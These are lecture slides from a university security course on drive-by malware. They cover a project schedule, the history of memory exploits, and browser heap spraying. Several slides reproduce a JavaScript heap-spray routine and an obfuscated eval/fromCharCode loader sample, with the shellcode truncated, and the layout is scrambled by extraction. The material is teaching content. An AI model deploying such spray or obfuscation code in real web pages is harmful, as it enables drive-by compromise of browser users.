CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits
Final Project 2 How many of you have your teams fully formed How many of you are still looking for a team? How many of you have a copy of A Bug Hunter’s Diary book? How many of your have built Firefox from the source?
Project Schedule 3 4 project-oriented sections Teams fully formed by 11/13 (today!): 11/13 midnight Getting the source and building it. Debugging the source code. Following the Proposals are due by 11/17 flow. (Monday 5pm) Using source browsing and search tools. Bug repositories. Advanced searches. Ethics form (Friday 5pm) 11/18: Fuzzing file formats with specialized tools. There’s a proposal Using memory inspection document tools such as Valgrind and Address Sanitizer.
Brief History of Memory-Based Exploits 1999: Melissa 2000 Stack-based overruns 2001: CodeRed 2002: Nimda Memory- based 2002 Heap-based overruns exploits 2005 Drive-by attacks and heap sprays 4
What is a Drive-By Attack? 0wned! 5
Drive-By Attack Example: Heap Spraying Browser Heap bad ok bad bad bad bad ok bad <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); oneblock = unescape("%u0C0C%u0C0C"); Allocate 1,000s of var fullblock = oneblock; while (fullblock.length<0x40000) { malicious objects fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT> 6
Heap Spraying http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html Firefox 3.5 July 14, 2009 7
More Complex Malware 8
Drive-by downloads THIS IS ONE OF KEY REASONS WHY BROWSER VULNERABILITIES ARE SO VALUABLE 9
Aspects of Drive-By Malware • Attacks • Malware is highly obfuscated – Browser – What is mostly affected? • Obfuscation changes all – Browser plugins the time – What is affected in plugins? Why plugins are most open to exploitation? • Vulnerabilities – Dangling pointers – Double frees – Buffer overruns are harder 11
Obfuscation eval (l(79)+l(61)+l(102)+l(117)+ eval (""+O(2369522)+O(1949494)+O OlOlll="(x)"; var l = function (x) { l(110)+l(99)+l(116)+l(105)+l(11 (2288625)+O(648464)+O(2304124)+ OllOlO=" String"; return String.fromCharCode(x); O(2080995)+O(2020710)+O(2164958 1)+l(110)+l(40)+l(109)+l(41)+l( OlllOO="tion"; } )+O(2168902)+O(1986377)+O(22279 123)+l(114)+l(101)+l(116)+l(117 OlOllO="Code(x)}"; 03)+O(2005851)+O(2021303)+O(646 )+l(114)+l(110)+l(32)+l(83)+l(1 var O = function (m){ OllOOO="Char"; 16)+l(114)+l(105)+l(110)+l(103) 435)+O(1228455)+O(644519)+O(234 return String.fromCharCode( OlllOl="func"; Math.floor(m / 10000) / 2); +l(46)+l(102)+l(114)+l(111)+l(1 6826)+O(2207788)+O(2023127)+O(2 OllllO=" l = "; } 09)+l(67)+l(104)+l(97)+l(114)+l 306806)+O(1983560)+O(1949296)+O OllOOl=".from"; (2245968)+O(2028685)+O(809214)+ (67)+l(111)+l(100)+l(101)+l(40) shellcode = unescape( "%u54EB%u758B…" ); OllOll="{return"; O(680960)+O(747602)+O(2346412)+ +l(77)+l(97)+l(116)+l(104)+l(46 var bigblock = unescape("%u0c0c%u0c0c"); Olllll="var"; O(1060647)+O(1045327)+O(1381007 )+l(102)+l(108)+l(111)+l(111)+l while (bigblock.length<slackspace) { eval (Olllll+OllllO+OlllOl+OlllO (114)+l(40)+l(109)+l(47)+l(49)+ )+O(1329180)+O(745897)+O(234140 bigblock += bigblock; O+OlOlll+OllOll+OllOlO+OllOOl+O l(48)+l(48)+l(48)+l(48)+l(41)+l 4)+O(1109791)+O(1064283)+O(1128 } llOOO+OlOllO); 719)+O(1321055)+O(748985)+...); (47)+l(50)+l(41)+l(59)+l(125)); block = bigblock.substring(0, bigblock.length-slackspace); while (block.length+slackspace<0x40000) { block = block + block + fillblock; } memory = new Array(); for (x=0; x<300; x++) { memory[x] = block + shellcode; 12 …
More Obfuscated Code 13
Malzilla 14
Malzilla (2) 15
Decoders 16
Disassemble? 17
And More 18
Recommend
More recommend
